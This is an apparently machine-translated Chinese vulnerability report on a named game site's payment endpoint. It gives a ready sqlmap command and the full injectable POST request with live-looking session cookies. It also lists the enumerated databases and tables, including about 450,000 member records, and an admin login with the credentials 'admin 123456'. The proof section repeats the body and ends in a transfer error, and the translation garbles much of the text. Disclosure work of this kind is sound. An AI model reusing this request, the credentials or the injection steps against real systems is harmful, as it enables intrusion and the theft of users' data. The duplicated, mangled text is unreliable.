漏洞标题 游戏安全40407游戏网络某处SQL注入（涉及50w用户信息）+系统弱密码 相关制造商 40407.com 漏洞作者 黑色键盘丶 提交时间 2016-04-28 09: 09 公共时间 2016-06-12 11: 00 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 Php +数字式注射，注射技术 漏洞详细信息 后注入语法：sqlmap.py -r 1.txt --dbs注入参数sid =====================post_package======================== POST /index.php?c=pay&a=testgamerole HTTP/1.1 主机: wan.40407.com 代理连接:保持活动状态 内容长度: 36 接受: */* 原点:http://wan.40407.com X-Requested-With: XMLHttpRequest 用户代理: Mozilla/5.0（Windows NT 6.1; WOW64）AppleWebKit/537.36（KHTML，与Gecko一样）Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 内容类型: application/x-www-form-urlencoded;字符集=UTF-8 Referer:http://wan.40407.com/index.php?c=pay&pt=pt Accept-Encoding: gzip，deflate Accept-Language: zh-CN，zh; q=0.8 Cookie: PHPSESSID=2f0313d49c83605b7c6c8d80cb40c971; _yd_=GA1.2.478994187.1461769909; Hm_lvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461769909,1461770157,1461770180,1461774259; Hm_lpvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461774398; DedeUserID=1988819; DedeUserID__ckMd5=e296d0b0648a8b88; DedeLoginTime=1461774649; DedeLoginTime__ckMd5=27c8d38a4bf65d3d; wanuserid=czo4OiJoZWlzZTEyMyI7; wanmember_mid=czo1OiI5NzMyNCI7; wansafe_pw=czozMjoiNDI5N2Y0NGIxMzk1NTIzNTI0NWIyNDk3Mzk5ZDdhOTMiOw％3D％3D; wansafe_yz=aToxOw％3D％3D 名=heise123＆安培; GID=5＆安培; SID=32＆安培; isyk= 数据库信息 可用数据库[25]: [*]`14x` [*]`399wantg` [*]`40407box_test` [*]`40407box` [*]`40407boxpt_test` [*]`40407boxpt` [*]`40407boxstat` [*]`40407data` [*]`40407kfz` [*]`40407lol` [*]`40407tqyt` [*]`dkwdv {` [*]`kp.ya58.cn` [*]`s} \ x1a！\ x03！` [*]`ucentir）\ x11` [*]`xiro7！` [*] bcgua [*] information_schema [*] mysql [*] percona [*] performance_schema [*] projeit [*] smweb [*] testcy [*]团 当前库表信息 数据库: 40407boxpt + ---------------------- + --------- + |表|参赛作品| + ---------------------- + --------- + | box_game_tg_data | 761184 | | box_game_member | 450339 | | box_gamecard_sn | 280019 | | box_pay | 22280 | | box_score_record | 4632 | | box_score_playinfo | 4016 | | box_member_mac | 3041 | | box_content_1 | 2220 | | box_content_1_extend | 1900年| | box_score_rule | 1306 | | box_pk_username | 1074 | | box_game_server | 650 | | box_content_1_item | 576 | | box_jf_pay | 479 | | box_tag | 236 | | box_admin_user | 227 | | box_score_game | 160 | | box_content_1_sjsg | 139 | | box_score_pay | 139 | | box_category | 131 | | box_content_1_jjsg | 125 | | box_content_1_sjtl | 90 | | box_content_1_hero | 67 | | box_content_1_zwx | 67 | | box_content_1_nslm | 55 | | box_model | 35 | | box_model_field | 35 | | box_game | 34 | | box_content_1_rxsg2 | 32 | | box_content_1_jyjh | 29 | | box_content_1_ocean | 26 | | box_content_1_hwsg | 25 | | box_content_1_mycs | 25 | | box_user_tg | 24 | | box_pay_cycle | 23 | | box_linkage | 18 | | box_ad | 16 | | box_content_1_jyjx | 16 | | box_pk_game | 13 | | box_pk_number | 13 | | box_content | 12 | | box_gid_modelid | 10 | | box_pingtaibi_fanli | 10 | | box_pk_rule | 10 | | box_content_1_bztx | 8 | | box_plugin | 6 | | box_content_1_smzt | 5 | | box_member_group | 5 | | box_admin_group | 4 | | box_content_1_jz | 4 | | box_content_1_rxsg | 4 | | box_role | 4 | | box_content_1_mjll | 3 | | box_wan_top_gg | 3 | | box_content_1_dsg | 2 | | box_content_1_game | 2 | | box_content_1_swydn | 2 | | box_content_1_xbjz | 2 | + ---------------------- + --------- + ------------------------------------- 数据库: 40407boxpt 45w用户信息 + ----------------- + --------- + |表|参赛作品| + ----------------- + --------- + | box_game_member | 450339 | + ----------------- + --------- + 超过200,000个估计卡密码信息，70多个信息，支付信息等。 由于它是延迟注入，因此它不会运行数据信息。 ================================================================================ http://tg.40407.com/admin/mainindex/index admin 123456输入 可以修改游戏的促销信息。

一些用户信息

漏洞证明： 后注入语法：sqlmap.py -r 1.txt --dbs注入参数sid =====================post_package======================== POST /index.php?c=pay&a=testgamerole HTTP/1.1 主机: wan.40407.com 代理连接:保持活动状态 内容长度: 36 接受: */* 原点:http://wan.40407.com X-Requested-With: XMLHttpRequest 用户代理: Mozilla/5.0（Windows NT 6.1; WOW64）AppleWebKit/537.36（KHTML，与Gecko一样）Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 内容类型: application/x-www-form-urlencoded;字符集=UTF-8 Referer:http://wan.40407.com/index.php?c=pay&pt=pt Accept-Encoding: gzip，deflate Accept-Language: zh-CN，zh; q=0.8 Cookie: PHPSESSID=2f0313d49c83605b7c6c8d80cb40c971; _yd_=GA1.2.478994187.1461769909; Hm_lvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461769909,1461770157,1461770180,1461774259; Hm_lpvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461774398; DedeUserID=1988819; DedeUserID__ckMd5=e296d0b0648a8b88; DedeLoginTime=1461774649; DedeLoginTime__ckMd5=27c8d38a4bf65d3d; wanuserid=czo4OiJoZWlzZTEyMyI7; wanmember_mid=czo1OiI5NzMyNCI7; wansafe_pw=czozMjoiNDI5N2Y0NGIxMzk1NTIzNTI0NWIyNDk3Mzk5ZDdhOTMiOw％3D％3D; wansafe_yz=aToxOw％3D％3D 名=heise123＆安培; GID=5＆安培; SID=32＆安培; isyk= 数据库信息 可用数据库[25]: [*]`14x` [*]`399wantg` [*]`40407box_test` [*]`40407box` [*]`40407boxpt_test` [*]`40407boxpt` [*]`40407boxstat` [*]`40407data` [*]`40407kfz` [*]`40407lol` [*]`40407tqyt` [*]`dkwdv {` [*]`kp.ya58.cn` [*]`s} \ x1a！\ x03！` [*]`ucentir）\ x11` [*]`xiro7！` [*] bcgua [*] information_schema [*] mysql [*] percona [*] performance_schema [*] projeit [*] smweb [*] testcy [*]团 当前库表信息 数据库: 40407boxpt + ---------------------- + --------- + |表|参赛作品| + ---------------------- + --------- + | box_game_tg_data | 761184 | | box_game_member | 450339 | | box_gamecard_sn | 280019 | | box_pay | 22280 | | box_score_record | 4632 | | box_score_playinfo | 4016 | | box_member_mac | 3041 | | box_content_1 | 2220 | | box_content_1_extend | 1900年| | box_score_rule | 1306 | | box_pk_username | 1074 | | box_game_server | 650 | | box_content_1_item | 576 | | box_jf_pay | 479 | | box_tag | 236 | | box_admin_user | 227 | | box_score_game | 160 | | box_content_1_sjsg | 139 | | box_score_pay | 139 | | box_category | 131 | | box_content_1_jjsg | 125 | | box_content_1_sjtl | 90 | | box_content_1_hero | 67 | | box_content_1_zwx | 67 | | box_content_1_nslm | 55 | | box_model | 35 | | box_model_field | 35 | | box_game | 34 | | box_content_1_rxsg2 | 32 | | box_content_1_jyjh | 29 | | box_content_1_ocean | 26 | | box_content_1_hwsg | 25 | | box_content_1_mycs | 25 | | box_user_tg | 24 | | box_pay_cycle | 23 | | box_linkage | 18 | | box_ad | 16 | | box_content_1_jyjx | 16 | | box_pk_game | 13 | | box_pk_number | 13 | | box_content | 12 | | box_gid_modelid | 10 | | box_pingtaibi_fanli | 10 | | box_pk_rule | 10 | | box_content_1_bztx | 8 | | box_plugin | 6 | | box_content_1_smzt | 5 | | box_member_group | 5 | | box_admin_group | 4 | | box_content_1_jz | 4 | | box_content_1_rxsg | 4 | | box_role | 4 | | box_content_1_mjll | 3 | | box_wan_top_gg | 3 | | box_content_1_dsg | 2 | | box_content_1_game | 2 | Failure when receiving data from the peer